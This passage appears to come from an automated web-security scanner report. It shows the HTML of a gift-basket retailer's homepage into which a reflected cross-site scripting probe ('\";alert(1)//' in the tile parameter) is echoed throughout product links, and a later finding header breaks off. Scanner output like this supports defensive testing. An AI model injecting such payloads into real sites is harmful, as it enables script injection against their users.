rrymoonfarms.com/giftbaskets/Snack-Gift-Basket-30043870?viewpos=3&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Snack Attack " border="0" /></a>
...[SNIP]...
errymoonfarms.com/giftbaskets/Snack-Gift-Basket-30043870?viewpos=3&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
nfarms.com/giftbaskets/Mrs-Fields-Bites-Basket-30000059?viewpos=4&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_BitesBsk_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Mrs. Fields.. Bites Basket" border="0" /></a>
...[SNIP]...
onfarms.com/giftbaskets/Mrs-Fields-Bites-Basket-30000059?viewpos=4&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
.com/flowers/Cherry-Moon-Treasures-Gift-Basket-30043792?viewpos=5&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMTREASBK_CmfTreasuresBsk_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Cherry Moon Treasures Gift Basket " border="0" /></a>
...[SNIP]...
s.com/flowers/Cherry-Moon-Treasures-Gift-Basket-30043792?viewpos=5&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
trawberry/Chocolate-Strawberries-Mini-Cheesecakes-42415?viewpos=6&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_CAK72203_BerryTestFancy6CheeseTrio_GEN_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Cheesecake Trio &amp; Full Half Dozen Giant Dipped Fancy Berries" border="0" /></a>
...[SNIP]...
strawberry/Chocolate-Strawberries-Mini-Cheesecakes-42415?viewpos=6&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
flowers/Classic-Fruit-Basket-Plus-3-Free-Gifts-30043789?viewpos=7&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCLASSIC3_ClassicFruitPlus3_SPR_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Classic Fruit Basket Plus 3 Free Gifts " border="0" /></a>
...[SNIP]...
/flowers/Classic-Fruit-Basket-Plus-3-Free-Gifts-30043789?viewpos=7&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
erry/Full-Half-Dozen-Hand-Picked-Fancy-Berries-30005179?viewpos=8&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10006_BerryTestFancy6v2_GEN_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Full Half Dozen Hand Picked Fancy Berries" border="0" /></a>
...[SNIP]...
berry/Full-Half-Dozen-Hand-Picked-Fancy-Berries-30005179?viewpos=8&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
ms.com/fruitbaskets/Tropical-Organic-Fruit-Sampler-5006?viewpos=9&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Tropical Organic Sampler" border="0" /></a>
...[SNIP]...
rms.com/fruitbaskets/Tropical-Organic-Fruit-Sampler-5006?viewpos=9&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
lower-Radiance-with-12-Giant-Dipped-Strawberries-43685?viewpos=10&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/M519BRR1001210_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Sunflower Radiance with 12 Giant Dipped Strawberries" border="0" /></a>
...[SNIP]...
flower-Radiance-with-12-Giant-Dipped-Strawberries-43685?viewpos=10&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
ts/Lavender-Relaxation-Bath--Body-Gift-Basket-30010076?viewpos=11&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAPROV_LavSpaV2_GEN_10_S10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Lavender Relaxation Bath &amp; Body Spa Basket for Mom" border="0" /></a>
...[SNIP]...
ets/Lavender-Relaxation-Bath--Body-Gift-Basket-30010076?viewpos=11&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
s.com/giftbaskets/Gourmet-Variety-Gift-Basket-30043796?viewpos=12&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMGORMETVAR_GourmVarBsk_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Gourmet Variety Basket" border="0" /></a>
...[SNIP]...
ms.com/giftbaskets/Gourmet-Variety-Gift-Basket-30043796?viewpos=12&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
ymoonfarms.com/giftbaskets/Cheers-Gift-Basket-30043794?viewpos=13&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCHEERSMOM_Cheers_SPR_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Cheers! " border="0" /></a>
...[SNIP]...
rymoonfarms.com/giftbaskets/Cheers-Gift-Basket-30043794?viewpos=13&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
herrymoonfarms.com/flowers/Spring-Treat-Tower-30052004?viewpos=14&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Spring Treat Tower" border="0" /></a>
...[SNIP]...
cherrymoonfarms.com/flowers/Spring-Treat-Tower-30052004?viewpos=14&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
farms.com/fruitbaskets/fruitasia-fruit-basket-30043866?viewpos=15&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRT_CKFFRUIT_Fruitasia_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Fruitasia " border="0" /></a>
...[SNIP]...
nfarms.com/fruitbaskets/fruitasia-fruit-basket-30043866?viewpos=15&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
m/flowers/Classic-Gourmet-Cheese--Snack-Board-30045397?viewpos=16&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Classic Gourmet Cheese &amp; Snack Board" border="0" /></a>
...[SNIP]...
om/flowers/Classic-Gourmet-Cheese--Snack-Board-30045397?viewpos=16&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
wers/Mothers-Day-Gourmet-Snack-and-Fruit-Rose-30050525?viewpos=17&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Mothers Day Gourmet Snack and Fruit Rose" border="0" /></a>
...[SNIP]...
owers/Mothers-Day-Gourmet-Snack-and-Fruit-Rose-30050525?viewpos=17&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
/monthlyfruit/Harvest-Deluxe-Fruit-Club--3-Months-5010?viewpos=18&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/KiwiPineapleFOTMSav_m?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Harvest Deluxe Fruit Club - 3 Months" border="0" /></a>
...[SNIP]...
m/monthlyfruit/Harvest-Deluxe-Fruit-Club--3-Months-5010?viewpos=18&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
oonfarms.com/cookies/Mrs-Fields-Classic-Crate-30000062?viewpos=19&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MRS_BSK_EDY08_ClscCrate_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Mrs. Fields.. Classic Crate" border="0" /></a>
...[SNIP]...
moonfarms.com/cookies/Mrs-Fields-Classic-Crate-30000062?viewpos=19&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
owers/Cherry-Moon-Farms-Favorites-Gift-Basket-30043797?viewpos=20&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CKMCMFFAVBKT_CmfFavsBsk_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Cherry Moon Farms Favorites Gift Basket " border="0" /></a>
...[SNIP]...
lowers/Cherry-Moon-Farms-Favorites-Gift-Basket-30043797?viewpos=20&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
oonfarms.com/flowers/Spring-Time-Sweets-Tower-30049358?viewpos=21&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Spring Time Sweets Tower" border="0" /></a>
...[SNIP]...
moonfarms.com/flowers/Spring-Time-Sweets-Tower-30049358?viewpos=21&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
ets/Rose-Petal-Calming-Bath--Body-Gift-Basket-30010075?viewpos=22&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/OCC_CKGSPAGRDN_RoseSpaV2_GEN_10_S10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Rose Petal Calming Bath &amp; Body Spa Basket for Mom" border="0" /></a>
...[SNIP]...
kets/Rose-Petal-Calming-Bath--Body-Gift-Basket-30010075?viewpos=22&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
cts.cherrymoonfarms.com/flowers/One-Sweet-Mix-30034405?viewpos=23&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/FRS_CXMONESWTMIX_OneSwetMixBx_GEN_10_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="One Sweet Mix" border="0" /></a>
...[SNIP]...
ucts.cherrymoonfarms.com/flowers/One-Sweet-Mix-30034405?viewpos=23&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
farms.com/flowers/Mrs-Fields-Spring-Bites-Box-30050183?viewpos=24&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:163px;width:163px;"><img height="163px" width="163px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/COO_SCOSPRBITBOX_BitesBx_MDY_11_FC_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=163&amp;hei=163" alt="Mrs. Fields Spring Bites Box" border="0" /></a>
...[SNIP]...
nfarms.com/flowers/Mrs-Fields-Spring-Bites-Box-30050183?viewpos=24&amp;trackingpgroup=CHP&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:23px;width:153px;"><img height="23px" width="153px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_DetailsBuyNowButton.gif" alt="" border="0" /></a>
...[SNIP]...
0" Title="" href="http://www.cherrymoonfarms.com/strawberries-ccs?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef&amp;CatID=hmpg_footerbanner" style="height:30px;width:768px;"><img height="30px" width="768px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
Input" type="text" value="Enter Your Email Here" id="_ctl13__ctl3_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img style="cursor:pointer" onclick="SetEmailEntryUrl()" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMFFooterArrow.gif" alt="Sign Up for Email Savings" border="0" /> </span>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div style="color:#7f732d; margin-top:10px; margin-bottom:20px;">
           <a href="http://www.providecommerce.com/aboutus.aspx" style="margin:0 10px 0 10px; color:#7f732d;">ABOUT US</a>
...[SNIP]...
</a>|
           <a class="corporateCode" href="http://www.proflowers.com/vip?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="margin:0 10px 0 10px; color:#7f732d;">BUSINESS GIFTING & SERVICES</a>
...[SNIP]...
<div style="margin-top:4px;">
               <a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx" style="margin:0 10px 0 10px; color:#7f732d;">PRIVACY POLICY</a>|
               <a href="https://accounts.proflowers.com/ManageReminders.aspx?cobrand=CMF" style="margin:0 10px 0 10px; color:#7f732d;">REMINDER SERVICE</a>
...[SNIP]...
</a>|
               <a rel="nofollow" href="http://www.providecommerce.com/terms.aspx" style="margin:0 10px 0 10px; color:#7f732d;">TERMS OF USE</a>
...[SNIP]...
</p><a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_PF_FOB.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a class="LogoSpacer" title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_PLA_FOB.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a class="LogoSpacer" title="International flower delivery" border="0" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_PFI_FOB.gif" alt="International flower delivery" border="0" /></a> <a class="LogoSpacer" title="The place for unique and personalized gifts." border="0" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_REDE_FOB.gif" alt="The place for unique and personalized gifts." border="0" /></a>
...[SNIP]...
<a class="LogoSpacer" border="0" title="Farm fresh fruit, gift baskets and delicious hand-made sweets." rel="nofollow"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_CMF_FOB.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a> <a class="LogoSpacer" title="Unique personalized gifts for life...s special occasions." border="0" rel="nofollow" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_PCR_FOB.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a class="LogoSpacer" title="Gourmet hand-dipped berries, cookies and cakes." border="0" rel="nofollow" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef"><img src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/cherrymoonfarms/images/CMF_SHB_FOB.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="LibertyMediaLinks">
        Other Liberty Media Brands and Services:
        <a href="http://www.berries.com" style="margin:0 10px 0 5px; color:#6e7831;">Hand-Dipped Strawberries</a>|
        <a href="http://www.redenvelope.com" style="margin:0 10px 0 5px; color:#6e7831;">Gifts</a>|
        <a href="http://www.buycostumes.com" style="margin:0 10px 0 5px; color:#6e7831;">Halloween Costumes</a>
...[SNIP]...
</center>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li><a style="color: #0000FF" href="http://www.facebook.com/CherryMoonFarms" />Cherry Moon Farms Facebook</a>
...[SNIP]...

16.27. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

